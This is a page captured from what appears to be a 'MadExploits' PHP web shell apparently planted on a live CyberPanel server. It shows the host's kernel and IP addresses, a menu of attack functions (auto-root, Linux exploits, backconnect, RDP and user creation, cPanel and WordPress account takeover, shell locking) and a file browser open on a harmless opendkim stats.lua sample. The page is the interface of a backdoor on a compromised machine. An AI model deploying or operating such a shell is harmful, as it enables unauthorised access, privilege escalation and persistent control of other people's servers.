Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
opendkim /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
example.com.ldif
7.91
KB
-rw-r--r--
final.lua.sample
2.04
KB
-rw-r--r--
opendkim.conf.sample
21.49
KB
-rw-r--r--
opendkim.conf.simple
708
B
-rw-r--r--
opendkim.conf.simple-verify
433
B
-rw-r--r--
screen.lua.sample
984
B
-rw-r--r--
setup.lua.sample
2.17
KB
-rw-r--r--
stats.lua
1.76
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : stats.lua
-- stats.lua -- conventional stats extensions -- -- Copyright (c) 2011, 2012, The Trusted Domain Project. All rights reserved. -- -- Referencing this as StatisticsScript from an opendkim that has both "stats" -- and "lua" enabled will produce some extended stats lines for each message -- that indicate whether the message passed SPF and/or SenderID, and -- whether or not SpamAssassin thought the message was spam. This might -- be useful for data correlation at the data aggregation point. -- -- SpamAssassin -- spam = odkim.get_header(ctx, "X-Spam-Status", 0) if spam == nil then odkim.stats(ctx, "spam", "-1") elseif string.sub(spam, 1, 3) == "No," or string.sub(spam, 2, 4) == "No," then odkim.stats(ctx, "spam", "0") elseif string.sub(spam, 1, 4) == "Yes," or string.sub(spam, 2, 5) == "Yes," then odkim.stats(ctx, "spam", "1") else odkim.stats(ctx, "spam", "-1") end -- -- SPF/Sender-ID -- n = 0 done = 0 found = 0 while (done == 0) do ares = odkim.get_header(ctx, "Authentication-Results", n) if ares == nil then done = 1 else spf = string.find(ares, "spf=", 1, true) if spf ~= nil then done = 1 found = 1 if string.find(ares, "spf=pass", 1, true) ~= nil then odkim.stats(ctx, "spf", "1") elseif string.find(ares, "spf=fail", 1, true) ~= nil then odkim.stats(ctx, "spf", "0") else odkim.stats(ctx, "spf", "-1") end if string.find(ares, "sender-id=pass", 1, true) ~= nil then odkim.stats(ctx, "senderid", "1") elseif string.find(ares, "sender-id=fail", 1, true) ~= nil then odkim.stats(ctx, "senderid", "0") else odkim.stats(ctx, "senderid", "-1") end end end n = n + 1 end if found == 0 then odkim.stats(ctx, "spf", "-1") odkim.stats(ctx, "senderid", "-1") end odkim.stats(ctx, "rcpts", tostring(odkim.rcpt_count(ctx)))
Close